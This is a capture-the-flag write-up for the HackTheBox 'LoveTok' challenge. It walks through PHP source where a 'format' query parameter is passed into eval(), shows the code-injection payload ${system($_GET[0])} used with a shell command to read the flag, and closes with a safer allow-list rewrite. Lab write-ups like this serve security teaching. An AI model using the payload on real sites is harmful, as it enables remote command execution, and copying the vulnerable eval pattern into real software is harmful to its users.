
HackTheBox - LoveTok

The home page displays a date and some text; clicking the "Nah, that doesn't work for me. Try again!" button redirects me to /?format=r and the date changes.
Nothing else stands out, so I'll download the provided source code and begin analysis.

TimeController.php

```php
<?php
class TimeController
{
    public function index($router)
    {
        $format = isset($_GET['format']) ? $_GET['format'] : 'r';
        $time = new TimeModel($format);
        return $router->view('index', ['time' => $time->getTime()]);
    }
}
```

The TimeController class retrieves the format parameter from the URL query string ($_GET['format']) if it exists; otherwise it assigns the default value r to $format.

TimeModel.php

```php
<?php
class TimeModel
{
    public function __construct($format)
    {
        $this->format = addslashes($format);

        [ $d, $h, $m, $s ] = [ rand(1, 6), rand(1, 23), rand(1, 59), rand(1, 69) ];
        $this->prediction = "+${d} day +${h} hour +${m} minute +${s} second";
    }

    public function getTime()
    {
        eval('$time = date("' . $this->format . '", strtotime("' . $this->prediction . '"));');
        return isset($time) ? $time : 'Something went terribly wrong';
    }
}
```

Right off the bat, I can see that the getTime() function uses PHP's eval(). This function is very dangerous because it executes a string as PHP code.

Code Injection

Because the user-supplied format is passed into eval() without proper sanitization, if I pass PHP code, e.g. ${system($_GET[0])}, as the format, the program should execute it as PHP code, and I can use & to append parameter 0 (the system command I want to execute): id-www. The addslashes() call is no defence here: it only escapes quotes, backslashes and NUL bytes, so it leaves the ${...} interpolation inside the double-quoted date() argument untouched. I'll write a Python script (just because I can) 😄 and retrieve the flag.

```bash
./HTB-LazyTok-PHP-CodeInjection.py 94.237.63.93:41900 "cat /flag*"
```

HTB{wh3n_********************p0pp1ng}
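For completeness, here is how the model could have been written without eval(). This is an added example, not the challenge's code; the class name SafeTimeModel and its ALLOWED_FORMATS list are my own. The format string is handed to date() as a plain argument, so date() treats unrecognised characters as literals instead of code, and an allow-list of expected formats stops odd values from reaching it at all.

```php
<?php
// Added example (not part of the LoveTok challenge source):
// the same behaviour as TimeModel, with the user-controlled format
// kept as data rather than spliced into an eval() string.
class SafeTimeModel
{
    // Formats the application actually offers; anything else falls back to 'r'.
    private const ALLOWED_FORMATS = ['r', 'c', 'U', 'Y-m-d H:i:s'];

    private string $format;
    private string $prediction;

    public function __construct(string $format)
    {
        // No addslashes(): escaping is irrelevant once there is no eval().
        $this->format = in_array($format, self::ALLOWED_FORMATS, true) ? $format : 'r';

        [$d, $h, $m, $s] = [rand(1, 6), rand(1, 23), rand(1, 59), rand(1, 69)];
        $this->prediction = "+{$d} day +{$h} hour +{$m} minute +{$s} second";
    }

    public function getTime(): string
    {
        $ts = strtotime($this->prediction);
        if ($ts === false) {
            return 'Something went terribly wrong';
        }
        // Direct call: $this->format is an argument to date(), never executed.
        return date($this->format, $ts);
    }
}

// Constructed inputs: the legitimate default and a hostile-looking format.
// The second one is simply rejected by the allow-list and rendered as 'r'.
foreach (['r', '${system($_GET[0])}'] as $format) {
    $model = new SafeTimeModel($format);
    printf("%-22s => %s\n", $format, $model->getTime());
}
```

Even without the allow-list, passing the raw string straight to date() would only produce a mangled date, since date() has no string interpolation of its own; the allow-list is defence in depth so that unexpected input is visible and rejected rather than silently rendered.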

Thanks for reading! Happy Hacking!!!

This post is licensed under CC BY 4.0 by the author.